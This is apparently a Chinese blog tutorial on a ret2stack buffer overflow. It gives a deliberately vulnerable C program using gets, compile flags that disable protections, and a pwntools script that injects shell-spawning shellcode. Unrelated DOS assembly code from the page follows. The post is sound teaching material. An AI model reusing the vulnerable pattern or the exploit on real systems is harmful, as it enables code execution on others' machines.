ret2stack

#include<stdio.h>
int main(){
 setbuf(stdin,0);
 setbuf(stdout,0);
 char str[100];
 printf("%p",&str);
 gets(str);
 return 0;
}

== setbuf(stdin,0)和setbuf(stdout)是关闭缓冲区,否则缓冲区会一直等到满了才会传送数据==

在这里插入图片描述

查看权限

在这里插入图片描述
gcc -fno-stack-protector -z execstack -no-pie -o debug debug.c

思路

由于NX关闭,所以可以构造shellcode
因为只有一个数组变量,栈顶开始的地方就是数组开始的地方,从栈顶开始填充shellcode,一直覆盖到rbp。最后追加数组地址,执行shellcode。

from pwn import *
context.arch="amd64"
shellcode=asm(shellcraft.amd64.sh())
p=process("./debug")
p.recv()

shellcode=shellcode.ljust(120,b"A")
buf=0x7fffffffdc80

payload=shellcode+p64(buf)

p.sendline(payload)
p.interactive()

用gdb计算buf的地址会有问题,用代码打印地址的方式最为保险。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
; 定义数据段 data segment hua db 'input yuanxin and banjing(example:200,200 100): $' ; 定义字符串常量 "input yuanxin and banjing(example:200,200 100): " zifu db 20 dup(0) ; 定义长度为 20 的字符数组 zifu shu db 20 dup(0) ; 定义长度为 20 的字符数组 shu suan db 24 dup(0) ; 定义长度为 24 的字符数组 suan data ends ; 定义栈段 stack segment stk db 16 dup(0) ; 定义长度为 16 的栈空间 stack ends ; 定义代码段 code segment assume cs:code, ds:data, ss:stack ; 定义代码段、数据段和栈段的关联关系 start: mov ax,data ; 将数据段的起始地址赋值给寄存器 AX mov ds,ax ; 将数据段的起始地址赋值给数据段寄存器 DS mov ax,stack ; 将栈段的起始地址赋值给寄存器 AX mov ss,ax ; 将栈段的起始地址赋值给栈段寄存器 SS mov dx,offset hua ; 将 hua 字符串的偏移地址赋值给寄存器 DX call showmsg ; 调用 showmsg 子程序 call input ; 调用 input 子程序 call zhuanshu ; 调用 zhuanshu 子程序 call moshi ; 调用 moshi 子程序 mov bx,offset shu ; 将 shu 数组的偏移地址赋值给寄存器 BX mov ax,ds:[bx] ; 将 shu 数组的前两个字节的值赋值给寄存器 AX mov si,ax ; 将 AX 的值赋值给寄存器 SI mov ax,ds:[bx+2] ; 将 shu 数组的第三、四个字节的值赋值给寄存器 AX mov di,ax ; 将 AX 的值赋值给寄存器 DI call drawyuan ; 调用 drawyuan 子程序 jmp start ; 无条件跳转到 start 标签处 input: mov bx,0 ; 将 BX 寄存器清零 mov cx,20 ; 将 CX 寄存器赋值为 20 re: mov ah,1h ; 设置 AH 寄存器为 1h int 21h ; 调用 DOS 中断 21h 的功能,等待用户输入字符 cmp al,0dh ; 将 AL 寄存器的值与 0dh 进行比较 jz scx ; 如果相等,跳转到 scx 标签处 mov si,offset zifu ; 将 zifu 数组的偏移地址赋值给寄存器 SI mov [bx][si],al ; 将用户输入的字符保存到 zifu 数组中 inc bx ; 将 BX 寄存器的值加 1 loop re ; 循环执行 re 标签处的指令 ret ; 返回 scx: mov cx,0 ; 将 CX 寄存器的值清零 ret ; 返回 showmsg: mov ah,9h ; 设置 AH 寄存器为 9h int 21h ; 调用 DOS 中断 21h 的功能,显示字符串 ret ; 返回 moshi: mov al,12h ; 将 AL 寄存器的值赋值为 12h mov ah,0 ; 将 AH 寄存器的值清零 int 10h ; 调用 BIOS 中断 10h 的功能,设置显示模式 ret ; 返回 zhuanshu: mov bx,offset zifu ; 将 zifu 数组的偏移地址赋值给寄存器 BX mov bp,offset shu ; 将 shu 数组的偏移地址赋值给寄存器 BP mov cx,16 ; 将 CX 寄存器赋值为 16 mov si,0 ; 将 SI 寄存器的值清零 mov di,0 ; 将 DI 寄存器的值清零

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值